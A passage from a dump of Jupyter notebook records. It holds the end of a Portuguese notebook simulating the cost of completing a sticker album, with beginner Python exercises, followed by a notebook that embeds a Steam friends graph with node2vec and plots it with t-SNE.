"Simulação: 50 / 1000\nSimulação: 100 / 1000\nSimulação: 150 / 1000\nSimulação: 200 / 1000\nSimulação: 250 / 1000\nSimulação: 300 / 1000\nSimulação: 350 / 1000\nSimulação: 400 / 1000\nSimulação: 450 / 1000\nSimulação: 500 / 1000\nSimulação: 550 / 1000\nSimulação: 600 / 1000\nSimulação: 650 / 1000\nSimulação: 700 / 1000\nSimulação: 750 / 1000\nSimulação: 800 / 1000\nSimulação: 850 / 1000\nSimulação: 900 / 1000\nSimulação: 950 / 1000\nSimulação: 1000 / 1000\n"
]
],
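[
[
"As an extra illustration, the same experiment can be written so that it only tracks how many distinct stickers are still missing, which avoids scanning the whole album after every packet. The function below is an alternative sketch, not the version used above.",
"_____no_output_____"
]
],
[
[
"def SimulaAlbumRapido():\n    # alternative sketch: track only the stickers that are still missing\n    faltando = set(range(n_album))\n    pacotes = 0\n    while faltando:\n        pacotinho = np.random.choice(range(n_album), 5)\n        faltando.difference_update(pacotinho.tolist())\n        pacotes += 1\n    valor_gasto = preco_album + preco_pacote * pacotes\n    return valor_gasto, pacotes\n\nSimulaAlbumRapido()",
"_____no_output_____"
]
],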
[
[
"As respostas das perguntas 1 e 2, respectivamente, são:",
"_____no_output_____"
]
],
[
[
"print('O valor médio gasto foi:', round(np.mean(valores), 2))\nprint('O numero de pacotes médio foi:', round((np.mean(valores) - preco_album)/preco_pacote, 2))",
"O valor médio gasto foi: 2245.0\nO numero de pacotes médio foi: 894.44\n"
]
],
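[
[
"How precise are these averages? As an extra illustration, the sketch below estimates the standard error of the simulated mean, which shrinks roughly with the square root of the number of simulations.",
"_____no_output_____"
]
],
[
[
"erro_padrao = np.std(valores) / np.sqrt(len(valores))\nprint('Approximate standard error of the estimated mean:', round(erro_padrao, 2))",
"_____no_output_____"
]
],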
[
[
"Podemos visualizar a distribuição empírica do valor gasto através do **histograma** dos valores simulados",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nplt.hist(valores, bins = 20, density = True, edgecolor = 'black')\nplt.title('Distribuição Empírica do Valor Gasto para Completar o Álbum')\nplt.show()",
"_____no_output_____"
]
],
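[
[
"Besides the histogram, a few order statistics give a compact summary of the empirical distribution. As an extra illustration, the sketch below prints the quartiles of the simulated costs.",
"_____no_output_____"
]
],
[
[
"q1, mediana, q3 = np.percentile(valores, [25, 50, 75])\nprint('1st quartile:', round(q1, 2))\nprint('Median:', round(mediana, 2))\nprint('3rd quartile:', round(q3, 2))",
"_____no_output_____"
]
],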
[
[
"# **Exercícios: Python para Data Science** <a name=\"exer\"></a>\nOs exercícios abaixo foram pensados para que iniciantes desenvolvam manejo e intimidade programando em python, utilizando os recursos fundamentais da linguagem.\n\nOs dois primeiros exercícios são mais simples. O exercício 3 já é um pouco mais elaborado e pode ser resolvido de várias formas. E o último exercício é apenas um complemento do projeto desenvolvido em aula sobre o álbum de figurinhas. Foram feitas mais perguntas para serem respondidas com o experimento. ",
"_____no_output_____"
],
[
"## **Exercício 1** \nConsidere um balde cuja base possui raio $r_1$ e altura igual ao diâmetro da base. Considere também uma esfera de raio $r_2$ cheia de água. Faça um programa que verifique se o volume da esfera cabe no balde, dados os valores de $r_1$ e $r_2$. \n",
"_____no_output_____"
],
[
"\n## **Exercício 2** \nCrie uma função que simule o jogo do *jokempô*, isto é, dada a entrada de dois jogadores, retorne a indicação de qual deles venceu. ",
"_____no_output_____"
],
[
"## **Exercício 3** \n\nFaça um programa que simule uma **slot machine**. Uma slot machine é uma máquina muito comum em cassinos. A pessoa puxa uma alavanca e aparecem na tela 3 símbolos aleatoriamente, de uma lista com diversos deles. Se os símbolos forem iguais, então a pessoa ganha. A pessoa entrar com um tanto escolhido de fichas, e joga até que acabe. Quando o programa terminar, uma mensagem resumindo os totais que ela ganhou deve ser exibida.",
"_____no_output_____"
],
[
"## **Exercício 4**\n\nConsidere o contexto do projeto do álbum de figurinhas e responda as perguntas adicionais: \n1. Quantas vezes saiu a figurinha mais repetida, em média?\n2. Em média, quantas figurinhas não se repetem ao completar o álbum?\n3. Qual a probabilidade de se gastar mais que R\\$3000,00 para completar o álbum?\n4. Qual a probabilidade de se gastar menos que R\\$1500,00 para completar o álbum?\n5. Qual a probabilidade de se gastar mais do que a média para completar o álbum?\n6. Qual é o intervalo de confiança de 95% para o gasto ao se completar o álbum?\n7. Qual o valor médio gasto caso se esteja completando o álbum com mais um amigo?\n8. Quanto se economiza ao utilizar o cenário da questão 7?\n9. Qual o valor médio gasto caso se esteja completando o álbum com mais dois amigos?\n10. Quanto se economiza ao utilizar o cenário da questão 9?",
"_____no_output_____"
],
[
" ## **Links Úteis** <a name=\"links\"></a>",
"_____no_output_____"
],
[
"1. [Documentação do Python](https://docs.python.org/3/)\n2. [Download do Anaconda](https://anaconda.org/)\n3. [Curso do Gustavo Guanabara no YouTube (Canal Curso em Vídeo)](https://www.youtube.com/watch?v=S9uPNppGsGo&list=PLvE-ZAFRgX8hnECDn1v9HNTI71veL3oW0)\n4. [Curso de Python gratuito do Kaggle (inglês)](https://www.kaggle.com/learn/python)\n5. [Conceitos de Python em 40min por Derek Banas (inglês)](https://www.youtube.com/watch?v=N4mEzFDjqtA) \n",
"_____no_output_____"
],
[
"## **Anexo** <a name=\"anex\"></a>\n",
"_____no_output_____"
],
[
"\n### **The Zen of Python, por Tim Peters**\n\nÉ um conjunto de regras pela qual o Python é idealizado.\n\n1. Bonito é melhor que feio.\n2. Explícito é melhor que implícito.\n3. Simples é melhor que complexo.\n4. Complexo é melhor que complicado.\n5. Plano é melhor que aglomerado.\n6. Esparso é melhor que denso.\n7. Legibilidade faz diferença.\n8. Casos especiais não são especiais o bastante para quebrar as regras.\n9. Embora a praticidade vença a pureza.\n10. Erros nunca devem passar silenciosamente.\n11. A menos que sejam explicitamente silenciados.\n12. Diante da ambigüidade, recuse a tentação de adivinhar.\n13. Deve haver um -- e preferencialmente só um -- modo óbvio para fazer algo.\n14. Embora esse modo possa não ser óbvio à primeira vista a menos que você seja holandês.\n15. Agora é melhor que nunca.\n16. Embora nunca freqüentemente seja melhor que *exatamente* agora.\n17. Se a implementação é difícil de explicar, é uma má idéia.\n18. Se a implementação é fácil de explicar, pode ser uma boa idéia.\n19. Namespaces são uma grande idéia -- vamos fazer mais dessas! ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb051932a7d2d02b6bf2e5a64f68b0f3e707de56 | 31,005 | ipynb | Jupyter Notebook | notebooks/node_2_vec/steam_node_2_vec.ipynb | sunnythepatel/Python-Scripts | ca8b4ea31971146689395c76e49a43216d39867b | [
"MIT"
] | 4 | 2018-10-13T00:30:25.000Z | 2020-04-23T18:06:50.000Z | notebooks/node_2_vec/steam_node_2_vec.ipynb | sunnythepatel/Python-Scripts | ca8b4ea31971146689395c76e49a43216d39867b | [
"MIT"
] | 14 | 2018-10-13T00:05:23.000Z | 2020-10-02T20:07:09.000Z | notebooks/node_2_vec/steam_node_2_vec.ipynb | sunnythepatel/Python-Scripts | ca8b4ea31971146689395c76e49a43216d39867b | [
"MIT"
] | 30 | 2018-10-13T00:18:26.000Z | 2019-12-03T13:32:44.000Z | 111.129032 | 23,908 | 0.856926 | [
[
[
"!pip install -r node2vec/requirements.txt",
"_____no_output_____"
],
[
"!pip install --upgrade gensim",
"_____no_output_____"
],
[
"!python node2vec/src/main.py --input jrtechs.edgelist --output output/jrtechs2.emd --num-walks=40 --dimensions=50",
"Walk iteration:\n1 / 40\n2 / 40\n3 / 40\n4 / 40\n5 / 40\n6 / 40\n7 / 40\n8 / 40\n9 / 40\n10 / 40\n11 / 40\n12 / 40\n13 / 40\n14 / 40\n15 / 40\n16 / 40\n17 / 40\n18 / 40\n19 / 40\n20 / 40\n21 / 40\n22 / 40\n23 / 40\n24 / 40\n25 / 40\n26 / 40\n27 / 40\n28 / 40\n29 / 40\n30 / 40\n31 / 40\n32 / 40\n33 / 40\n34 / 40\n35 / 40\n36 / 40\n37 / 40\n38 / 40\n39 / 40\n40 / 40\n"
],
[
"labels=[]\nvectors=[]\n\nwith open(\"output/jrtechs2.emd\") as fp:\n for line in fp:\n l_list = list(map(float, line.split()))\n vectors.append(l_list[1::])\n labels.append(line.split()[0])\n \nprint(len(labels))",
"39\n"
],
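[
"# Extra illustration (not part of the original workflow): the .emd file written by\n# node2vec is in word2vec text format, so it could also be loaded with the gensim\n# package installed above, which skips the header line automatically.\n# Assumes gensim >= 4.0 for the KeyedVectors API used below.\nfrom gensim.models import KeyedVectors\n\nkv = KeyedVectors.load_word2vec_format(\"output/jrtechs2.emd\")\nprint(kv.vectors.shape)\n# nodes closest to the node stored in the first embedding row\nprint(kv.most_similar(kv.index_to_key[0], topn=5))",
"_____no_output_____"
],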
[
"name_map = {}\nwith open(\"friendsMap.map\") as fp:\n for line in fp:\n name_map[line.split()[0]] = line.split()[1]",
"_____no_output_____"
],
[
"name_map",
"_____no_output_____"
],
[
"from sklearn.decomposition import IncrementalPCA # inital reduction\nfrom sklearn.manifold import TSNE # final reduction\nimport numpy as np \n\ndef reduce_dimensions(labels, vectors, num_dimensions=2):\n \n # convert both lists into numpy vectors for reduction\n vectors = np.asarray(vectors)\n labels = np.asarray(labels)\n\n # reduce using t-SNE\n vectors = np.asarray(vectors)\n tsne = TSNE(n_components=num_dimensions, random_state=0)\n vectors = tsne.fit_transform(vectors)\n\n x_vals = [v[0] for v in vectors]\n y_vals = [v[1] for v in vectors]\n return x_vals, y_vals, labels\n\nvectors\nx_vals, y_vals, labels = reduce_dimensions(labels, vectors)",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\nimport random\n\ndef plot_with_matplotlib(x_vals, y_vals, labels, num_to_label):\n plt.figure(figsize=(5, 5))\n plt.scatter(x_vals, y_vals)\n plt.title(\"Embedding Space\")\n indices = list(range(len(labels)))\n selected_indices = random.sample(indices, num_to_label)\n for i in selected_indices:\n plt.annotate(name_map[labels[i]], (x_vals[i], y_vals[i]))\n plt.savefig('ex.png')\n \nplot_with_matplotlib(x_vals, y_vals, labels, 12)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |